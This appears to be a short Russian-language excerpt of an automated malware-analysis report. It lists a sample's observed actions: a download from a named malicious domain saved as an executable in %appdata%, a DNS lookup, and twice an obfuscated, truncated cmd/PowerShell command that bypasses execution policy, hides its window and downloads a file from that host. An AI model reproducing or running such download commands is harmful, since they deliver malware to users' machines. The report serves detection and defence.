Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^ER^SHEL^l^.exE^ ^-EXeCut^Ion^po^LI^C^Y B^ypa^SS ^-NoproF^ile -wiN^dOwSTy^L^e HIDdEN^ (N^EW^-obJe^C^T^ SYstEM.nEt.^WEBCLIenT).^D^O^wNLOADFilE^(^'http://www.doorasope.top/r...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "poW^ER^SHEL^l^.exE^ ^-EXeCut^Ion^po^LI^C^Y B^ypa^SS ^-NoproF^ile -wiN^dOwSTy^L^e HIDdEN^ (N^EW^-obJe^C^T^ SYstEM.nEt.^WEBCLIenT).^D^O^wNLOADFilE^(^'http://www.doorasope.top/r...' (со скрытым окном)